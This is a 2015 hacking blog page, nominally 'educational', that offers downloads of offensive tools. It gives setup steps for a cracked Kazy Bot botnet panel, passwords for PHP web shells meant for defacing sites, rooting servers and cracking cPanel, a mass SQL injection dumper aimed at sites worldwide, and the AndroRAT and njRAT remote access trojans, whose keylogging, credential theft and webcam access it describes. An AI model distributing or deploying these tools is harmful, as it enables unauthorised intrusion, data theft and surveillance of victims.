Just Educational Purpose Only For Pentesters And Developers

  • challenge

    I was addicted to hacking, more for the intellectual challenge, the curiosity, the seduction of adventure; not for stealing, or causing damage or writing computer viruses. Kevin Mitnick

    Read More
  • Computer hacking

    Computer hacking really results in financial losses and hassles. The objectives of terrorist groups are more serious. That is not to say that cyber groups can't access a telephone switch in Manhattan on a day like 9/11, shut it down, and therefore cause more casualties.Kevin Mitnick

    Read More
  • The only Entertainment

    Hacking was the only entertainment that would occupy my mind - like a huge video game, but with real consequences. I could have evaded the FBI a lot longer if I had been able to control my passion for hacking.Kevin Mitnick

    Read More

Monday, May 25, 2015

Kazy Bot Full Version ( Cracked)(No Port Forward)


step 1 ) upload files from php folder to your hosting's public_html folder
step 2 ) create datebase with name kazybot
step 3 ) import database file to your kazybot database
step 4 ) connect your server from window client
step 5 ) build server.exe with your server address
==+==+==+==+==+==+>Enjoy Hacking<==+==+==+==+==+==+==+==


Download
click to begin
4.43MB .zip

Thursday, May 21, 2015

Hacking ASP.Net Website

The best attacking for asp.net web application hacker handbook.


Download

click to begin

1.3MB .pdf

The Webapplication Hackers HandBook

Chapter 1  Web Application (In)security 
Chapter 2  Core Defense Mechanisms
Chapter 3  Web Application Technologies 
Chapter 4  Mapping the Application 
Chapter 5  Bypassing Client-Side Controls 
Chapter 6  Attacking Authentication 
Chapter 7  Attacking Session Management 
Chapter 8  Attacking Access Controls 
Chapter 9  Attacking Data Stores 
Chapter 10  Attacking Back-End Components 
Chapter 11  Attacking Application Logic 
Chapter 12  Attacking Users: Cross-Site Scripting 
Chapter 13  Attacking Users: Other Techniques 
Chapter 14  Automating Customized Attacks 
Chapter 15  Exploiting Information Disclosure 
Chapter 16  Attacking Native Compiled Applications 
Chapter 17  Attacking Application Architecture 
Chapter 18  Attacking the Application Server 
Chapter 19  Finding Vulnerabilities in Source Code 
Chapter 20  A Web Application Hacker’s Toolkit 
Chapter 21  A Web Application Hacker’s Methodology 



Download

click to begin

13MB .pdf

Monday, May 18, 2015

Brute Force Password File Creator

Brute Force password file creator is one  to create large password automatically.This tool is created by Fjux from hackforums.

Download

click to begin

3.37 KB .zip

Friday, May 15, 2015

404 Not Found Private Shell



when we got the admin access we need to upload shell. After uploading shell we can index deface of a website, server rooting, cpanel cracking etc. There are many php shell like C99, R57 etc. One of the best and secure shell is 404 not found private shell. Without password you can't open it. So if you upload shell in a server without you none can use it.
So what is it?

After uploading shell when you open the shell link you can find a page like this:



After move your mouse cursor and fix it when it get a box for giving a password.


Password for shell -> abc
Download

click to begin

1.7MB .txt

Injector Team Shell

password for injector team shell -> inj3ct0r

Download

click to begin

1.5MB .txt

KALI LINUX ASSURING SECURITY BY PENETRATION TESTING 2014


Download

click to begin

1.7MB .zip

Wednesday, May 13, 2015

SQLi Dumper - Advanced SQL Injection\Scanner Tool v7.0 Private Version





Designed to be automated to find and exploit web security vulnerabilities in mass from worldwide!
It is robust, works in the background threads and is super faster.
Uses an advanced search engine with 10 different online search services.

Last release: 06/23/2014 v.7.0

SQLi Dumper Features:

-Suports 20 methods of SQL Injection;
-Suports Multi. Online search engine (to find the trajects);
-Automated search for data in a bulk URL list;
-Automated analizer and dumper with custom injections points (URL, POST, Cookies, UserLogin or UserPassword);
-Dumper suports dumping data with multi-threading (databases/tables/columns/fetching data);
-Exploiter, Analizer and Dumper suports up to 50x separeted threads;
-Advanced WAF bypass methods;
-Advanced custom query box;
-Dumper can dump large amounts of data, with greats control of delay each request;
-Easy switch vulnerabilities to vulnerabilities (internal database);
-Suports proxies list;
-GeoIP database;
-Advanced Trash System works with millions of urls;
-Admin login finder;
-Standalone .exe (no install).
credit -> http://sqldumper.blogspot.com

 

Download
click to begin
2.2MB .zip

Word List Download(sites)

Thursday, May 7, 2015

SQL Injection Bypassing HandBook


Content writers :-

Chapter I:::


  • SQL Injection: What is it?
  • SQL Injection: An In-depth Explanation
  • Why is it possible to pass SQL queries directly to a database that is hidden behind a firewall and any other security mechanism?
  • Is my database at risk to SQL Injection?
  • What is the impact of SQL Injection?
  • Example of a SQLInjection Attack

WebApplication Firewalls::

  • Detecting A WAF
  • Prompt Message
  • Dotdefender
  • Observing HTTP Response

Chapter II

Advanced evasion techniques for defeating SQL injection Input validation mechanisms
Web applications are becoming more and more technically complex. Web applications, their

  • Whitespace
  • Null Bytes
  • SQL Comments
  • URL Encoding
  • Changing Cases
  • Encode to Hex Forbidden
  • Replacing keywords technique
  • WAF Bypassing – using characters
  • HTTP Parameter Pollution (HPP)
  • CRLF WAF Bypass technique
  • Buffer Overflow bypassing

Chapter III

Let's see the matter in an orderly fashion from the beginning

  • See If Site vulnerability Or Not
  • Get Column Number
  • Bypassing union select
  • Get Version
  • Group & Concat
  • Bypass with Information_schema.tables
  • Requested Baypassing

Chapter IIII

Other issues related to the subject
  • Null Parameter
  • FIND VULNERABLE COLUMNS
  • Count(*)
  • unhex()
  • Get database
  •  
Download : MediaFire

Monday, May 4, 2015

AndroRAT

Androrat is a client/server application developed in Java Android for the client side and in Java/Swing for the Server.It has been developed in a team of 4 for a university project. It has been realised in one month. The goal of the application is to give the control of the android system remotely and retrieve informations from it.


Download -
Download

click to begin

1.7MB .zip



njRAT

The notorious remote access Trojan (RAT) known as njRAT is making a comeback, according to security firms Zscaler and PhishMe.The RAT, developed in .NET, allows attackers to take complete control of an infected device. The malware is capable of logging keystrokes, downloading and executing files, providing remote desktop access, stealing application credentials, and accessing the infected computer’s webcam and microphone.PhishMe reports that njRAT has been distributed over the past period with the aid of spam emails advertising a car changer hack for the “Need for Speed: World” video game. Zscaler also noted that video game cracks and application key generators are often used as lure.


Download Here->
Download

click to begin

1.7MB .zip